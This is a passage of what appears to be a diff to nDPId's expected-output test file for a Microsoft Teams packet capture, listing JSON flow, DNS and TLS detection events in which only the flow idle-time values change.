{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -210,12 +210,12 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1587041684304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1587041684304,"pkt":"KDc3AG3IEBMx8Tl2CABFAADIzNlAADkR8PPAqAEBwKgBBgA16AsAtAAAN+6BgAABAAUAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAHADAAFAAEAAABCABQJc3Vic3RyYXRlB21zLWFjZGPAFsAyAAUAAQAAABYACAVhZmQta8AWwFIABQABAAAAGQAoEm91dGxvb2stb2ZmaWNlLWNvbQZrLTAwMDIIay1tc2VkZ2UDbmV0AMBmAAUAAQAAAKAAAsB5wHkAAQABAAAAoQAEDWsSCw=="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -234,8 +234,8 @@ 00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1587041685105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1587041685105,"pkt":"KDc3AG3IEBMx8Tl2CABFAACTMl9AADkRi6PAqAEBwKgBBgA1\/s4AfwAAB0qBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAcAMAAUAAQAADNUAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJAAEAAQAAAAgABDRyDy0="} 00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1587041685127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1587041685127,"pkt":"KDc3AG3IEBMx8Tl2CABFAADKzTRAADkR8JbAqAEBwKgBBgA1xd0AtgAAqleBgAABAAMAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAA4OACoDYXBpC2ZsaWdodHByb3h5BXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsACcbYy1mbGlnaHRwcm94eS1ldW5vLTAxLXRlYW1zCGNsb3VkYXBwwGbAdwABAAEAAAAGAAQ0ck2I"} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1587041685136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1587041685136,"pkt":"KDc3AG3IEBMx8Tl2CABFAADDZa9AADkRWCPAqAEBwKgBBgA17z0ArwAAVKqBgAABAAMAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAALoAAiBGV1YXoCdHIFdGVhbXMOdHJhZmZpY21hbmFnZXIDbmV0AMA5AAUAAQAAAAAAMBJiLXRyLXRlYW1zLWV1bm8tMDULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAJMBnAAEAAQAAAAoABDRy+ns="} @@ -245,70 +245,70 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1587041685185,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1587041685185,"pkt":"KDc3AG3IEBMx8Tl2CABFAADeqaxAADkRFAvAqAEBwKgBBgA15FkAygAAl0WBgAABAAYAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQABwAwABQABAAAANQAMCXN1YnN0cmF0ZcAUwDAABQABAAAAxQAUCXN1YnN0cmF0ZQdtcy1hY2RjwBTASAAFAAEAAAAmAAgFYWZkLWvAFMBoAAUAAQAAACYAKBJvdXRsb29rLW9mZmljZS1jb20Gay0wMDAyCGstbXNlZGdlA25ldADAfAAFAAEAAACgAALAj8CPAAEAAQAAAJ8ABA1rEgs="} 00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} 